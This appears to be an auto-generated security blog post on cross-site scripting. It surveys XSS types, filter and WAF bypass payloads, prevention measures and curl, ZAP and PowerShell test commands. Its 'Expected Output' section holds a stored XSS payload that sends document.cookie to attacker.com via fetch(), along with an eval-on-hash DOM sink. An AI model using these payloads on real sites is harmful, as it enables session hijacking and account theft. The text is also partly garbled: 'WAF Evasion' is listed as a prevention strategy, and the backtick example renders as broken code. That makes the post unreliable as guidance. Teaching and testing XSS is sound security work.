Cross-Site Scripting (XSS): Techniques, Bypasses & Detection

By /

Listen to this Post

Featured Image
Cross-Site Scripting (XSS) is a critical web vulnerability where attackers inject malicious JavaScript into trusted sites, leading to session hijacking, data theft, and account compromise.

Types of XSS

  1. Reflected XSS – Payload is passed via URL or request and echoed back, ideal for phishing.
  2. Stored XSS – Malicious code is saved in a database or comment section, triggering upon viewing.
  3. DOM-Based XSS – Entirely client-side, exploiting unsafe JavaScript DOM operations.

Advanced Bypass Techniques

Obfuscation & Filter Evasion

  • Bracket Notation – Avoid detection using `document[‘cookie’]` instead of document.cookie.
  • Base64 Encoding – Encode payloads to evade simple filters: 
    btoa("alert(1)"); // Encodes to "YWxlcnQoMSk=" 
atob("YWxlcnQoMSk="); // Decodes back to "alert(1)"
  • Octal & Hex Encoding – Bypass WAFs using alternative syntax: 
    \141\154\145\162\164(1); // Octal for "alert(1)" 
\x61\x6c\x65\x72\x74(1); // Hex for "alert(1)"

Bypassing Parentheses & WAFs

  • Backtick Syntax – Execute functions without parentheses: 
    alert<code>1</code>;
  • Event Handlers – Trigger via HTML attributes: 
    <img src="x" onerror="alert(1)">
  • Throw Syntax – Alternative execution method: 
    throw onerror=alert, "aaaa", "bbbb";

Detection & Prevention Strategies

  • Contextual Encoding – Escape output based on context (HTML, JS, CSS, URL).
  • Content Security Policy (CSP) – Restrict script execution to trusted sources using nonces.
  • Secure Cookies – Use `HttpOnly` and `SameSite` flags to prevent theft.
  • WAF Evasion – Combine encoding, alternative syntax, and obfuscation.

You Should Know:

Practical XSS Testing Commands

1. Test for Reflected XSS (Linux):

curl -s "http://example.com/search?q=<script>alert(1)</script>" | grep -i "script"

2. Check DOM XSS (Browser Console):

console.log(document.location.hash); // Check for unsafe hash usage

3. Automated Scanning with ZAP:

zap-cli quick-scan -s xss http://example.com

4. Windows Command for Payload Testing:

Invoke-WebRequest "http://example.com/?q=<svg/onload=alert(1)>"

What Undercode Say

XSS remains a top web threat due to improper input handling and weak WAF rules. Modern bypass techniques leverage encoding, event handlers, and JavaScript quirks. Prevention requires layered defenses: CSP, output encoding, and secure cookie policies.

Expected Output:

  • Reflected XSS Exploit: 
    http://example.com/search?q=<script>alert(document.cookie)</script>
  • Stored XSS Payload: 
    <script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script>
  • DOM XSS via Hash: 
    eval(decodeURIComponent(location.hash.slice(1)));

Prediction

XSS attacks will evolve with AI-driven payload generation, making traditional WAFs less effective. Future defenses may rely on runtime behavior analysis and stricter CSP policies.

URLs:

IT/Security Reporter URL:

Reported By: Zlatanh Crosssite – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: